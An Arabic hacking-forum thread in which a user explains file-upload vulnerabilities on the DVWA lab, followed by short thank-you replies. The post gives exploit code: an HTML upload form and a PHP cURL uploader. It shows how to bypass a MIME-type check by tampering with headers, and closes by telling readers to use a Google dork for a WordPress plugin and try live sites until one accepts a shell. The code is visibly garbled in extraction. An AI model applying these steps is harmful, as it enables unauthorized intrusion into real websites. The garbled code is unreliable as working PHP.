1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : V!rus-MarOc | المشاهدات : 445 | الردود : 8
  1. V!rus-MarOc Developer

    الأنتساب:
    ‏26 ديسمبر 2011
    المشاركات:
    55
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    30
    الوظيفة:
    Hacker
    الإقامة:
    ©MAЯΘ
    نظام التشغيل:
    Linux
    بسم الله الرحمــــن الرحيم

    السلام عليكم

    راح استخدم في الشرح مختبر الاختراق dvwa

    اول شيء اكتشاف التغرة

    نلاحظ الكود التالي


    كود PHP:
     <?php
        
    if (isset($_POST['Upload'])) {

                
    $target_path DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
                
    $target_path $target_path basename$_FILES['uploaded']['name']);

                if(!
    move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                    
                    
    $html .= '<pre>';
                    
    $html .= 'Your image was not uploaded.';
                    
    $html .= '</pre>';
                    
                  } else {
                
                    
    $html .= '<pre>';
                    
    $html .= $target_path ' succesfully uploaded!';
                    
    $html .= '</pre>';
                    
                }

            }
    ?> 
    اكتر الدوال مسببة للتغرة انتشارا هي move_uploaded_file و copy

    الكود اعلى مصاب و الاصابة في دالة move_uploaded_file

    شرح للدالة هنا و هنا ايضا

    شرح الكود

    كود PHP:
     <?php
        
    if (isset($_POST['Upload'])) { // يتحقق من ادى تم طلب الرفع

                
    $target_path DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/"// مسار رفع الملف
                
    $target_path $target_path basename$_FILES['uploaded']['name']); // المسار الكامل مع اسم الملف الدي تم رفعه

                
    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) { // يتم رفع الملف بدون التحقق من اي شيء الى المسار الموضوع اعلاه
                    
                    
    $html .= '<pre>';
                    
    $html .= 'Your image was not uploaded.'// ادا رفع الملف بنجاح يطبع الجملة التالية
                    
    $html .= '</pre>';
                    
                  } else {
                
                    
    $html .= '<pre>';
                    
    $html .= $target_path ' succesfully uploaded!'// ادا لم يرفع الملف يطبع الجملة التالية
                    
    $html .= '</pre>';
                    
                }

            }
    ?> 
    تمام ، ننتقل لكتابة الاستغلال

    الاستغلال ب html لا يحتاج شرح ، فاللغة سهلة جدا :{13}:

    كود PHP:
    <html>
    <
    form method="POST" action="http://localhost/pentest/tuto/dvwalab/vulnerabilities/upload/" enctype="multipart/form-data">
    <
    input name="uploaded" type="file" />
    <
    input type="submit" name="Upload" value="Upload" />
    </
    html>
    بعد الاستغلال

    [​IMG]

    php

    راح نستخدم مكتبة curl

    نعمل function للرفع مع مراعاة اسماء الفورم في التغرة الي هي

    كود PHP:
    uploaded
    الفنكشن كالتالي

    كود PHP:
    function upl($x$f){
        
    $ch curl_init($x); // الاتصال بالموقع
        
    $post = array(    "Upload"=>true,  // قيم البوسط المراد ارسالها ، المف و تأكيد الرفع
                        
    "uploaded"=>"@"    .    $f);
        
    curl_setopt($chCURLOPT_POSTtrue);
        
    curl_setopt($chCURLOPT_POSTFIELDS$post); // ارسال القيم
        
    curl_setopt($chCURLOPT_RETURNTRANSFER1); // العودة بسورس بعد انتهاء العملية
        
    curl_exec($ch); // تنفيد
        
    curl_close($ch); // اغلاق
    }
    و نعم تحقق من ادا تم رفع الملف

    باستخدام path في التغرة

    كود PHP:
    $target_path $target_path basename$_FILES['uploaded']['name']);
    و شكل الاستغلال سيكون كالتالي

    كود PHP:
     <?php
    set_time_limit
    (0);
    error_reporting(0);

    if(
    preg_match('/hamza/'file_get_contents("http://localhost/pentest/tuto/dvwalab/hackable/uploads/1.txt"))){ // يتحقق من الملف هل رفع
        
    echo"uploaded"// ادا رفع يطبع الجملة التالية
    }else{
        echo
    "error"// ادا لم يرفع يطبع الجملة التالية
    }

    function 
    upl($x$f){
        
    $post = array(    "Upload"=>"upload",  // قيم البوسط المراد ارسالها ، المف و تأكيد الرفع
                        
    "uploaded"=>"@"    .    $f);
        
    $ch curl_init($x); // الاتصال بالموقع
        
    curl_setopt($chCURLOPT_COOKIEFILE'cookie.txt'); // كوكيز للدخول اللوحة (غير مهم)
        
    curl_setopt($chCURLOPT_POSTtrue);
        
    curl_setopt($chCURLOPT_POSTFIELDS$post); // ارسال القيم
        
    curl_setopt($chCURLOPT_RETURNTRANSFER1); // العودة بسورس بعد انتهاء العملية
        
    $data curl_exec($ch); // تنفيد
        
    curl_close($ch); // اغلاق
        
    return $data;
    تمام ، في بعض المرات تصادف بعض المشاكل متل

    كود PHP:
     <?php
        
    if (isset($_POST['Upload'])) {

                
    $target_path DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
                
    $target_path $target_path basename($_FILES['uploaded']['name']);
                
    $uploaded_name $_FILES['uploaded']['name'];
                
    $uploaded_type $_FILES['uploaded']['type'];
                
    $uploaded_size $_FILES['uploaded']['size'];

                if ((
    $uploaded_type == "image/jpeg") && ($uploaded_size 100000)){


                    if(!
    move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                    
                        
    $html .= '<pre>';
                        
    $html .= 'Your image was not uploaded.';
                        
    $html .= '</pre>';
                        
                      } else {
                    
                        
    $html .= '<pre>';
                        
    $html .= $target_path ' succesfully uploaded!';
                        
    $html .= '</pre>';
                        
                        }
                }
                else{
                    echo 
    '<pre>Your image was not uploaded.</pre>';
                }
            }
    ?> 
    الاختلاف او هاي الكود يتحقق من نوع الملف المرفوع و حجمه

    كود PHP:
    if (($uploaded_type == "image/jpeg") && ($uploaded_size 100000)){
    التخطي يكون بتغيير نوع الملف اتناء الارسال
    عن طريق live http headers او tamper data
    متال في الصورة

    from

    [​IMG]

    to

    [​IMG]

    و الناتج

    [​IMG]

    و شرح للاختراق بواسطتها
    ندهب الى احد مواقع الحماية او الى قسم التغرات
    ناحد اي تغرة و نشرح عليها
    كمثال التغرة التالية


    نعمل دورك للتغرة
    كود PHP:
    inurl:plugins/wp-easycart
    و نبحت عن مواقع في google

    [​IMG]

    و تجرب موقع موقع حتى تجد موقع مصاب و ترفع عليه الشل

    الى هنا يكون انتهى الموضوع :ُeُiy:
     
    1 person likes this.
  2. al_98r Developer

    الأنتساب:
    ‏21 يوليو 2014
    المشاركات:
    112
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    يعطيك العآآفيه على الشرح
    ماآ قصرت ..
    :ُ{10}:ُ​
     
  3. karwan DeveloPer Plus

    الأنتساب:
    ‏7 يناير 2013
    المشاركات:
    122
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    "{IRAQ}"
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    السلام عليكم ورحمة الله وبركاته

    يـــعــطــيـــك الـــعــافـــيــه
     
  4. xdvb Developer

    الأنتساب:
    ‏1 أغسطس 2014
    المشاركات:
    74
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    يعطيك العآآفيه على الشرح
     
  5. nasern Active DeveloPer

    الأنتساب:
    ‏26 مارس 2012
    المشاركات:
    93
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    يعطيك العافيه
     
  6. nasern Active DeveloPer

    الأنتساب:
    ‏26 مارس 2012
    المشاركات:
    93
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    ماذا تعتقد في مشاركة V!rus-MarOc؟يعجبني ويستحق التقييم
     
  7. coiffa Developer

    الأنتساب:
    ‏1 يناير 2013
    المشاركات:
    41
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    موضوع رائع ويستحق التقييم
     
  8. ElHaZeN Developer

    الأنتساب:
    ‏20 أكتوبر 2014
    المشاركات:
    21
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    windows 8
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    تسلم ايديك يا وحش
     
  9. Mokhalad HaXor آداريً شؤون الأعضًاء

    الأنتساب:
    ‏3 يوليو 2012
    المشاركات:
    3,319
    الإعجابات المتلقاة:
    2,463
    نقاط الجائزة:
    255
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:
    etc/shadow
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    PHP
    Facebook:
    YouTube:
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    بارك الله بيك حبيبي موضوع جميل جدآ
    لاتحرمنا من جديدك يا ورد
    {1!$7}
     

مشاركة هذه الصفحة